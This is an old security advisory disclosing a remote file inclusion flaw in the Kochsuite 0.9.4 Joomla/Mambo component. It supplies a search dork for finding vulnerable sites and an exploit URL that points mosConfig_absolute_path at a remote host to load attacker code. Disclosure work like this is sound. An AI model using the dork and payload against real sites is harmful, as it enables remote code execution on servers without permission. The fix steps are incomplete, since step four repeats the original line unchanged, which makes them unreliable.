.:[ insecurity research team ]:. .__..____.:.______.____.:.____ . .:. | |/ \:/ ___// __ \:/ _\.:. : | | | \\____\\ ___/\ /__ :. . ..: |__|___| /____ >\___ >\___ >.: .:.. .. .\/ .:\/:. .\/. .:\/: . ...:. .advisory. .:... :..................: 18.o8.2oo6 .. Affected Application: Kochsuite v0.9.4 (Mambo/Joomla CMS Component) . . :[ contact ]: . . . . . . . . . . . . . . . . . . . . . . . . . . . Discoverd by: camino Team: Insecurity Research Team URL: http://www.insecurityresearch.org E-Mail: camino[at]sexmagnet[dot]com . . :[ insecure application details ]: . . . . . . . . . . . . . . . . . Typ: Remote [x] Local [ ] Remote File Inclusion [x] SQL Injection [ ] Level: Low [ ] Middle [x] High [ ] Application: Kochsuite Version: 0.9.4 Vulnerable File: config.kochsuite.php URL: http://www.vegisto.com Description: It's a component for chiefs to publish theirs stuff... Dork: inurl:"com_kochsuite" . . :[ exploit ]: . . . . . . . . . . . . . . . . . . . . . . . . . . . http://[sitepath]/[joomlapath]/administrator/components/com_kochsuite/ config.kochsuite.php?mosConfig_absolute_path=http://huh? . . :[ how to fix ]: . . . . . . . . . . . . . . . . . . . . . . . . . . o1.) open config.kochsuite.php o2.) take a look at line 46: # Don't allow direct linking defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' ); o3.) take a look at line 47: require_once ($mosConfig_absolute_path.'/administrator/ components/com_kochsuite/includes/letters.inc'); o4.) change line 46: defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' ); . . :[ greets ]: . . . . . . . . . . . . . . . . . . . . . . . . . . . . my girlfriend, brOmstar, ACiDAngel, PoKi, Waze and all the sexy members of insecurity research team ;-)